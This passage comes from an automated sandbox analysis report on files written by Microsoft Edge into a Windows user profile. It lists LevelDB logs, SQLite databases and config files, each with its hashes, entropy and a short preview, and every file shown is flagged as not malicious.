                                                                                                                                                                                                                                                                SSDEEP:6:7A0q2PCHhJ23oH+Tcwt9Eh1tIFUt8OAxhFZZmw+OA8ckwOCHhJ23oH+Tcwt9Eh1H:7rvBYeb9Eh16FUt8OwX/+OE56Yeb9Ehx
                                                                                                                                                                                                                                                                MD5:CF7D63975AFAAB9D6398C1106D4E9227
                                                                                                                                                                                                                                                                SHA1:185C499A0A719A38F015DB43C6D75BE32DEAFF2C
                                                                                                                                                                                                                                                                SHA-256:F377D0C90A5F74C90C4C34AD7D515286DE2D8DAEB851BC02F60A2958841C0830
                                                                                                                                                                                                                                                                SHA-512:38EC42D5D1A9ED081FD8C50942E7496D6A09E3FEDB19429A1016DB483D653C7B4192BB63766B38CCEC7963F03E532548A8DD40C5FC7CEC0E68D0DC4F37DC883C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:14.387 1170 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/16-07:47:14.389 1170 Recovering log #3.2024/12/16-07:47:14.392 1170 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                Entropy (8bit):0.46331128768562296
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu5L:TouQq3qh7z3bY2LNW9WMcUvBuV
                                                                                                                                                                                                                                                                MD5:0F46428545ECA8D0A9ADDA73676C4DAF
                                                                                                                                                                                                                                                                SHA1:66179EC6A8CBA8A2E417F3968A725A93E64538DC
                                                                                                                                                                                                                                                                SHA-256:375381C4AD83620CAFB4ADBB182C3C396613B03FAC3BF83BC6582466A6DE4060
                                                                                                                                                                                                                                                                SHA-512:E05F980AF534CC71A0EF1E808C52042AEE1E77A32263B7D208D5EAC63741E3E4854CF3B0D5E80BFB2B8E8B71C0FACF8D3CAAD81C02CFE9800230F7C72936E334
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):345
                                                                                                                                                                                                                                                                Entropy (8bit):5.271620942937293
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7Aq+q2PCHhJ23oH+TcwtnG2tMsIFUt8OAuZmw+OAqVkwOCHhJ23oH+TcwtnG2tM2:7WvBYebn9GFUt8OP/+Od56Yebn95J
                                                                                                                                                                                                                                                                MD5:4C19E3D247BA0608BFECCB1773840883
                                                                                                                                                                                                                                                                SHA1:A80B208F2EE92173D34168CD5C2C8B7F163ECB7D
                                                                                                                                                                                                                                                                SHA-256:CC598C3A921FEB3E9CFF0642104A671689D7A70E8005DFBCF122DE2FCFDDF482
                                                                                                                                                                                                                                                                SHA-512:97BFF3FAB427B30AB9B7C5260A497EBF1775D6234092AA596A50F685B8823AD4FC3C7C9DD82146B9DC06785DF1A3262808CF235437FE309F23C1BE57321F0648
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:09.520 b18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/16-07:47:09.520 b18 Recovering log #3.2024/12/16-07:47:09.520 b18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):345
                                                                                                                                                                                                                                                                Entropy (8bit):5.271620942937293
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7Aq+q2PCHhJ23oH+TcwtnG2tMsIFUt8OAuZmw+OAqVkwOCHhJ23oH+TcwtnG2tM2:7WvBYebn9GFUt8OP/+Od56Yebn95J
                                                                                                                                                                                                                                                                MD5:4C19E3D247BA0608BFECCB1773840883
                                                                                                                                                                                                                                                                SHA1:A80B208F2EE92173D34168CD5C2C8B7F163ECB7D
                                                                                                                                                                                                                                                                SHA-256:CC598C3A921FEB3E9CFF0642104A671689D7A70E8005DFBCF122DE2FCFDDF482
                                                                                                                                                                                                                                                                SHA-512:97BFF3FAB427B30AB9B7C5260A497EBF1775D6234092AA596A50F685B8823AD4FC3C7C9DD82146B9DC06785DF1A3262808CF235437FE309F23C1BE57321F0648
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:09.520 b18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/16-07:47:09.520 b18 Recovering log #3.2024/12/16-07:47:09.520 b18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                Entropy (8bit):0.611752685321821
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jFUDpe4mL:TO8D4jJ/6Up+JUi
                                                                                                                                                                                                                                                                MD5:F9AF95D5438A135712370705C9D2827B
                                                                                                                                                                                                                                                                SHA1:E0887360AED8B05DF7470EAAFAB517DC9A3F212B
                                                                                                                                                                                                                                                                SHA-256:4FB132458F22C6CDD9ADEDB2C0A606B816C0813125250E8AEA79E188BDDAE7A0
                                                                                                                                                                                                                                                                SHA-512:68F26902D29C35FE0FE94007FB930CCAD9838129D78C2FC0D3BF3E19843B9BA298ED016BB1624DE0DA97AFD5478B8A19B9A625C223FD120D3A6D5C5C55AEFA61
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):375520
                                                                                                                                                                                                                                                                Entropy (8bit):5.354172478845045
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:YA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:YFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                MD5:5B3F85DA3F34815DD71F14DC22490216
                                                                                                                                                                                                                                                                SHA1:7097EA1451E6B3EE2859A1DC1B10EFD008134E19
                                                                                                                                                                                                                                                                SHA-256:3BBFC6BB094D113D2DF0E9809AFF2ADAD79901C96E1D37449FBF4387C42BEC55
                                                                                                                                                                                                                                                                SHA-512:8B97D1A5C38D61E9E328FEC3AAB32991B29317969D9ED6562049069CDBA6C617A48F1601E6F505AEF0D655E9803BA6A6DD9AA21CFC35E4A694B1427B55534904
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1....q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13378826837343446..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):309
                                                                                                                                                                                                                                                                Entropy (8bit):5.196952953237287
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7ABB1CHhJ23oH+Tcwtk2WwnvB2KLlpAj+q2PCHhJ23oH+Tcwtk2WwnvIFUv:7oYebkxwnvFLTHvBYebkxwnQFUv
                                                                                                                                                                                                                                                                MD5:876D80FB9EE2E78598BFA31E658EBD8C
                                                                                                                                                                                                                                                                SHA1:B0988432D2361EB590B69752E0ACB329A987CDE6
                                                                                                                                                                                                                                                                SHA-256:865B9C9BAD646CBAF8F6003355E1143BFA4B900AD485B5CFAE6E77D5699C64F1
                                                                                                                                                                                                                                                                SHA-512:AD963CC4D86A17E174055DE710D82976465A606AF79C2D2185AB2089C514FF5AEC273BEAE80C7CF2CA5580A2CB3C9ADC584E56759449151ACB23456E9F0A5FAF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:14.466 ef8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/16-07:47:14.749 ef8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                Size (bytes):358860
                                                                                                                                                                                                                                                                Entropy (8bit):5.324605139479234
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rr:C1gAg1zfvz
                                                                                                                                                                                                                                                                MD5:EA7DEB1633EA6BA1E9FCB6FACFE994CD
                                                                                                                                                                                                                                                                SHA1:E04F12BEA6BA43E1A55ABE91C7B9834E3EBC653F
                                                                                                                                                                                                                                                                SHA-256:B973076509C13763000EB2509221FE20070CA6627F4D7B3F12621026DDD2B75E
                                                                                                                                                                                                                                                                SHA-512:2C8968D26F231676E0AC5DB3D32FC2B27F1F1FF33F7A4251C6139D6E7F3E4953A518373AE18D4DFB69F4DB1133C64FBE090A8AB74A0C9B7940B7CEE8B0A89E42
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):418
                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):324
                                                                                                                                                                                                                                                                Entropy (8bit):5.278003944835078
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7AOO+q2PCHhJ23oH+Tcwt8aPrqIFUt8OA6Zmw+OAWVkwOCHhJ23oH+Tcwt8amLJ:7RvBYebL3FUt8ON/+O/56YebQJ
                                                                                                                                                                                                                                                                MD5:7FD11C48E4E5EDD030D8032A4B3C6E2F
                                                                                                                                                                                                                                                                SHA1:C2809F653050B7990F76B00D9A2EB08275CB0249
                                                                                                                                                                                                                                                                SHA-256:ACCD487C4A66526308161E850F53C4F8D478DFE9B436499EAC9D45CFE900AA75
                                                                                                                                                                                                                                                                SHA-512:A1EB9B4043F6F5E474B19A2D03CCFB4EA430E1EB0E0AB47243405AF0DFCD5047544C7AD5E0DDE1B622699AF76C413B9154C31122CF3C3209825C4B382190552E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:09.547 1b48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/16-07:47:09.548 1b48 Recovering log #3.2024/12/16-07:47:09.548 1b48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):324
                                                                                                                                                                                                                                                                Entropy (8bit):5.278003944835078
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7AOO+q2PCHhJ23oH+Tcwt8aPrqIFUt8OA6Zmw+OAWVkwOCHhJ23oH+Tcwt8amLJ:7RvBYebL3FUt8ON/+O/56YebQJ
                                                                                                                                                                                                                                                                MD5:7FD11C48E4E5EDD030D8032A4B3C6E2F
                                                                                                                                                                                                                                                                SHA1:C2809F653050B7990F76B00D9A2EB08275CB0249
                                                                                                                                                                                                                                                                SHA-256:ACCD487C4A66526308161E850F53C4F8D478DFE9B436499EAC9D45CFE900AA75
                                                                                                                                                                                                                                                                SHA-512:A1EB9B4043F6F5E474B19A2D03CCFB4EA430E1EB0E0AB47243405AF0DFCD5047544C7AD5E0DDE1B622699AF76C413B9154C31122CF3C3209825C4B382190552E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:09.547 1b48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/16-07:47:09.548 1b48 Recovering log #3.2024/12/16-07:47:09.548 1b48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):418
                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                Entropy (8bit):5.302809172031791
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7Agt+q2PCHhJ23oH+Tcwt865IFUt8OAsLZmw+OAhVkwOCHhJ23oH+Tcwt86+ULJ:7SvBYeb/WFUt8OBL/+Oq56Yeb/+SJ
                                                                                                                                                                                                                                                                MD5:424AEFFE3B83ABF97069A702E793F36D
                                                                                                                                                                                                                                                                SHA1:0F9778586E2E67622355F9953637A30EADDAE692
                                                                                                                                                                                                                                                                SHA-256:6CB9C25BC9E6D69A9D6FAAA06D7FCE8871423676F61D24A6FC468BF4C381184C
                                                                                                                                                                                                                                                                SHA-512:2B391E65D528072616853227970A06F568A6582BA4F19CE65044B8BB26D965C5F2167C123519F190B1CA7FAC728E026B12EED111C5AD7B9B59D8E801E2746A76
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:09.559 1b48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/16-07:47:09.562 1b48 Recovering log #3.2024/12/16-07:47:09.563 1b48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                Entropy (8bit):5.302809172031791
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7Agt+q2PCHhJ23oH+Tcwt865IFUt8OAsLZmw+OAhVkwOCHhJ23oH+Tcwt86+ULJ:7SvBYeb/WFUt8OBL/+Oq56Yeb/+SJ
                                                                                                                                                                                                                                                                MD5:424AEFFE3B83ABF97069A702E793F36D
                                                                                                                                                                                                                                                                SHA1:0F9778586E2E67622355F9953637A30EADDAE692
                                                                                                                                                                                                                                                                SHA-256:6CB9C25BC9E6D69A9D6FAAA06D7FCE8871423676F61D24A6FC468BF4C381184C
                                                                                                                                                                                                                                                                SHA-512:2B391E65D528072616853227970A06F568A6582BA4F19CE65044B8BB26D965C5F2167C123519F190B1CA7FAC728E026B12EED111C5AD7B9B59D8E801E2746A76
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:09.559 1b48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/16-07:47:09.562 1b48 Recovering log #3.2024/12/16-07:47:09.563 1b48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1254
                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                MD5:826B4C0003ABB7604485322423C5212A
